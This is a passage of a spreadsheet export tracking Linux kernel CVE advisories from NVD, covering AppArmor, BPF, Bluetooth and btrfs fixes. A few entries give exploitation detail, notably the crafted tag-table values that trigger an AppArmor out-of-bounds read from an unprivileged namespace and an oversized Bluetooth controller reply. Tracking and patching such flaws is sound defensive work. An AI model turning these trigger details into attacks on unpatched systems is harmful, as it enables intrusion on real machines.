count close to U32_MAX makes the sum wrap to a small value, the guard
passes, and the inner loop then walks sets.table[++i] past the end of
the kcalloc(size, sizeof(u32)) allocation.
Note that sets.size is bounded by 65535, because unpack_tagsets() reads
it with aa_unpack_array() as a u16, so the wrap cannot be reached by
growing the table; it is reached purely through the attacker-supplied
count.
With sets.size = 2 and sets.table = { 0, 0xffffffff }:
  i = 0: cnt = 0, guard 0 + 0 &gt;= 2 is false, inner loop does not run
  i = 1: cnt = 0xffffffff, guard (1 + 0xffffffff) mod 2^32 == 0 &gt;= 2 is
         false, so the guard is bypassed and the inner loop reads
         sets.table[2] -- one element past a two element allocation
The walk continues until an out-of-bounds value happens to be &gt;=
hdrs.size or the access faults, so a crafted policy yields an
out-of-bounds read on the policy load path
(aa_replace_profiles -&gt; aa_unpack -&gt; unpack_policydb -&gt; unpack_tags -&gt;
verify_tags).  unpack_tags() runs before the perms and DFA tables are
unpacked, so no other table needs to be well formed to reach it.
Policy load is gated by aa_may_manage_policy(), which checks
CAP_MAC_ADMIN relative to the subject's own user namespace rather than
the init user namespace, so with the default
unprivileged_userns_apparmor_policy=1 the path is reachable from an
unprivileged task in a matched-level nested namespace, not only by a
globally privileged one.
Perform the addition in u64 so that it cannot wrap, restoring the
intended i + cnt &lt; sets.size guarantee.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90246</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90247</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix mmap_lock leak in irq_work path
stack_map_get_build_id_offset() introduced a per-CPU irq_work to defer
mmap_read_unlock() from NMI context, and bpf_find_vma() later reused the
same mmap_unlock_work. Both callers only check whether the work is busy
before taking mmap_lock, so a nested caller can reuse the slot before the
first caller queues it. Two read locks may then be acquired while only one
deferred unlock runs, leaking a read lock and blocking exit_mmap().
Reserve the per-CPU slot before mmap_read_trylock(). Use the same wrapper
in stackmap and bpf_find_vma() so both callers release the reservation on
trylock failure. Keep rejecting the slot while the irq_work remains busy.
Release it after the irq_work callback unlocks the mm.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90247</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90248</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_api: fix teardown of an adopted proto on insert-race loss
In tc_new_tfilter() the create branch sets tp_created = 1 before calling
tcf_chain_tp_insert_unique(). When the caller loses the race (another
request inserted a proto at the same chain/prio first), insert_unique()
destroys the caller's own tp_new and returns the winner's proto with an
extra reference. tp_created was never cleared, so the loser's errout
path treated the winner's live proto as its own and called
tcf_chain_tp_delete_empty() on it, silently unlinking an active
classifier that the winning request already advertised via
RTM_NEWTFILTER.
Track the outcome of the insert step in a single tri-state variable so
each errout path reacts correctly:
- TP_NOT_CREATED: no proto created; pursue the old path.
- TP_CREATED: proto inserted successfully; same code path as before.
- TP_NOT_OWNED: New - lost the insert race; tp is another request's proto
  (chain ref already released by tp_new's destroy)
Both errout reactions are single expressions derived from the state.
This fix is motivated by the Sashiko's automated review of Patch
(net/sched: cls_api: Always acquire rtnl_lock when destroying locked
classifiers) [1][2]. The review identified the silent-unlink behaviour of
an adopted proto's teardown when a request loses the
tcf_chain_tp_insert_unique() race.
[1] https://sashiko.dev/#/patchset/20260801125632.360365-1-jhs%40mojatatu.com
[2] https://netdev-ai.bots.linux.dev/sashiko/#/patchset/20260801125632.360365-1-jhs%40mojatatu.com</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90248</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90249</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: light: gp2ap002: Fix unbalanced runtime PM on repeated event writes
The IIO core does not filter duplicate writes to the event enable
attribute, so writing the same value twice invokes
write_event_config() twice. Enabling twice leaks a runtime PM
reference, preventing the device from ever suspending again;
disabling twice underflows the usage count and triggers a
"Runtime PM usage count underflow" warning.
Bail out early when the requested state matches the current state.
While at it, switch to pm_runtime_resume_and_get() so a failed
resume is propagated to userspace instead of silently marking the
event enabled.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90249</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90250</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, cgroup: Fix storage null-ptr-deref after replacing prog
Syzkaller reported a storage null-ptr-deref issue after replacing prog.
This occurs in the following scenario:
1. prog A, an empty prog, is attached to a cgrp.
2. prog B uses BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE and calls the
   bpf_get_local_storage helper.
3. link_update is called to replace prog A with prog B.
The reason is that __cgroup_bpf_replace fails to alloc and assign the
required cgrp storage for the incoming replacement prog. Consequently,
the new prog inherits an uninit storage, leading to null-ptr-deref panic
when kick the new prog.
Fix this by rejecting a link update if new_prog's cgroup storage is
incompatible with link-&gt;prog.</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90250</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90251</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MSFT: validate evt_prefix_len against the response length
read_supported_features() only checks that the response covers the fixed
part of struct msft_rp_read_supported_features, which is 11 bytes:
	if (skb-&gt;len &lt; sizeof(*rp)) {
		bt_dev_err(hdev, "MSFT supported features length mismatch");
		goto failed;
	}
evt_prefix[] is a flexible array member and rp-&gt;evt_prefix_len is an
unvalidated u8 taken straight out of that response, so
	msft-&gt;evt_prefix = kmemdup(rp-&gt;evt_prefix, rp-&gt;evt_prefix_len,
				   GFP_KERNEL);
copies up to 255 bytes from a reply that may have carried none of them.
What is copied is data the controller never sent, and it is then used to
match incoming vendor events in msft_vendor_evt().
This is not an out-of-bounds access. An skb data allocation always has
at least SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) bytes past the
payload, which is more than the 255 byte maximum, so the read stays
inside the allocation and KASAN does not report it. It is still a read
of bytes the host was never given, with the length fully controlled by
the controller.
Reject a response that is too short for the prefix it declares.
Verified with an emulated controller over /dev/vhci on a KASAN kernel,
with vhci made to advertise an MSFT opcode the way btintel, btqca, btmtk
and btrtl do unconditionally. A reply of exactly 11 bytes declaring
evt_prefix_len = 255 reaches kmemdup and copies 255 bytes
("skb-&gt;len=11 evt_prefix_len=255", with the copied buffer dumped); since
the reply ends at the fixed part, all 255 come from past the end of the
response. No KASAN report is produced, as expected from the allocation
slack described above. With this patch the response is rejected with
"MSFT event prefix length mismatch" and msft-&gt;evt_prefix is left unset.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90251</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90252</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2026-09-17</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MGMT: free the HCI command when it is cancelled
mgmt_hci_cmd_sync() queues the pending command with a NULL destroy
callback, so it is only freed if send_hci_cmd_sync() runs. A cancelled
entry is leaked, as _hci_cmd_sync_cancel_entry() does not release
entry-&gt;data when there is no destroy callback, and hci_cmd_sync_clear()
cancels every pending entry when the controller is unregistered. Nothing
else reclaims it either: mgmt_pending_new() does not put the command on
hdev-&gt;mgmt_pending.
The leak also pins the socket reference taken by mgmt_pending_new(), so
the mgmt socket is never released.
Free the command from a destroy callback. The now-empty done label is
replaced by a direct return.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90252</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90253</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2026-09-17</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MGMT: free the mesh send cancel command when it is cancelled
mesh_send_cancel() queues the pending command with a NULL destroy
callback, so it is only freed if send_cancel() runs. A cancelled entry is
leaked, as _hci_cmd_sync_cancel_entry() does not release entry-&gt;data when
there is no destroy callback, and hci_cmd_sync_clear() cancels every
pending entry when the controller is unregistered. Nothing else reclaims
it either: mgmt_pending_new() does not put the command on
hdev-&gt;mgmt_pending.
The leak also pins the socket reference taken by mgmt_pending_new(), so
the mgmt socket is never released.
Free the command from a destroy callback.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90253</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90254</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_sync: free the advertising instance on the failure and cancel paths
adv_timeout_expire() hands a kmalloc()ed instance byte to
hci_cmd_sync_queue() with a NULL destroy callback, and only
adv_timeout_expire_sync() frees it. That leaks on two paths:
 - the return value is not checked, and hci_cmd_sync_queue() does not
   take ownership when it fails (-ENETDOWN, -ENODEV, -ENOMEM);
 - a cancelled entry is not released, as _hci_cmd_sync_cancel_entry()
   does not free entry-&gt;data when there is no destroy callback.
   hci_cmd_sync_clear() cancels every pending entry when the controller
   is unregistered.
Free the buffer from a destroy callback, and in the caller when the entry
could not be queued at all.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90254</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90255</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_conn: fix the SCO setup context lifetime
hci_setup_sync() queues a conn_handle_t with a NULL destroy callback, so
the context is only freed if hci_enhanced_setup_sync() actually runs. An
entry that is cancelled instead is leaked, as
_hci_cmd_sync_cancel_entry() does not release entry-&gt;data when there is
no destroy callback, and hci_cmd_sync_clear() cancels every pending entry
when the controller is unregistered.
The context also stores a bare hci_conn pointer, so the connection can be
freed while the work is queued. The dequeue in hci_conn_del() does not
cover it either, as it matches on entry-&gt;data == conn and entry-&gt;data is
the wrapper here. Same problem as commit 2f5d635ad590 ("Bluetooth:
hci_sync: hold conn in hci_connect_acl/le_sync() callbacks").
Hold the connection and release both from a destroy callback. The
submission failure path drops both, since hci_cmd_sync_submit() does not
call the destroy callback when it fails to queue.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90255</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90256</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: use proto_lock for l2cap_data to fix l2cap_disconn_ind
hci_conn::l2cap_data is accessed without locks in l2cap_disconn_ind via
hci_conn_timeout (disc_work) -&gt; hci_proto_disconn_ind -&gt;
l2cap_disconn_ind.  This is UAF if the l2cap_conn is deleted
concurrently.
disc_work is disabled sync in hci_conn_del(), so we cannot take
hci_dev_lock in disc_work.
Fix by using proto_lock to guard l2cap_data, in addition to hdev-&gt;lock
which is held in other access paths.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90256</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90257</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2026-09-17</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: virtio_bt: avoid OOB read of build info string
The virtbt_setup_zephyr() sends the Zephyr vendor command 0xfc08 (Read
Build Information) and hands the response to bt_dev_info() and
hci_set_fw_info() as a "%s" string starting at skb-&gt;data + 1, without
checking the length. A backend that answers with status only leaves that
pointer past the end of the received data, so the walk reads adjacent
slab memory until it meets a NUL. Those bytes reach the kernel log and
the firmware-info debugfs file.
To fix this, print the string with a bounded "%.*s" limited to
skb-&gt;len - 1. A short or unterminated response then prints as much as
arrived instead of failing setup.
This mirrors commit dd068ef04412 ("Bluetooth: bpa10x: avoid OOB read of
revision string in bpa10x_setup()"), which fixed the identical pattern.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90257</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90258</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2026-09-17</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: airoha: add missed IRQ resource helpers
Without hooking .irq_request_resources, gpiolib cannot set
GPIOD_FLAG_USED_AS_IRQ. This breaks pin direction locking and can allow
userspace or another driver to reconfigure an active IRQ pin as an output</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90258</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90259</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2026-09-17</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: qgroup: fix a wrong length calculation in qgroup_free_reserved_data()
In that function, we round down the start position and round up the
ending position.
But during the calculation of @len, we use "round_up(start + len,
sectorsize)", which is the rounded up end position, not the rounded up
length.
Which results a much larger length, and later we are still using
"start + len", which is completely incorrect.
Fix it by declaring a local @aligned_start and @aligned_len and use them
instead.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90259</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90260</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2026-09-17</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: don't clobber the extent buffer when zeroing it out
On a zoned filesystem a freed-but-still-dirty tree block is written out
as zeros (EXTENT_BUFFER_ZONED_ZEROOUT) only to keep the zone write
pointer advancing. btree_csum_one_bio() implemented this by memzeroing
the extent buffer's own folios before submission.
That destroys the in-memory buffer while it may still be referenced. In
particular btrfs_free_tree_block() can run on it afterwards and reads
the header to add a delayed reference; once the header has been zeroed
it frees bytenr 0 and corrupts the extent tree (the
btrfs_header_bytenr(buf) != 0 ASSERT in btrfs_free_tree_block(), or an
"unable to find ref" abort). It is flaky and reproduces under fsstress,
e.g. generic/461 and generic/013.
Write the zeros to disk from the shared zero page instead and leave the
extent buffer content untouched, so any later reference - including the
delayed reference from btrfs_free_tree_block() - still sees a valid
header. end_bbio_meta_write() now clears writeback on the buffer's own
folios, as the bio no longer carries them.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90260</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90261</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="inlineStr"/>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr"/>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: flush active metadata block group at btree_writepages() start
btree_writepages() writes the btree inode's dirty metadata in ascending
logical address order. On a zoned filesystem only one metadata and one
system block group is active for writing at a time, and
check_bg_is_active() (via btrfs_check_meta_write_pointer()) pivots the
active block group as writeback moves from one block group to the next.
If the active block group sits at a higher logical address than another
block group that also holds dirty metadata, the ascending walk reaches
the lower one first and, to write it, has to finish the active block
group and activate the lower one. It cannot finish a block group that
still has unsent IO, and during WB_SYNC_ALL &amp;&amp; !for_sync (commit)
writeback it deliberately refuses to wait for that IO under
fs_info-&gt;zoned_meta_io_lock, as that can deadlock. The pivot thus cannot
issue the submission itself either, so it gives up:
btrfs_check_meta_write_pointer() returns -EAGAIN, which
btrfs_write_and_wait_transaction() treats as fatal and aborts the
transaction, forcing the filesystem read-only. This happens
intermittently under metadata-heavy relocation (e.g. fstests btrfs/187).
Flush the active metadata and system block groups at the start of
btree_writepages(), under the fs_info-&gt;zoned_meta_io_lock it already
holds, so they have no unsent IO left and the later pivot can finish
them and make forward progress.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90261</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
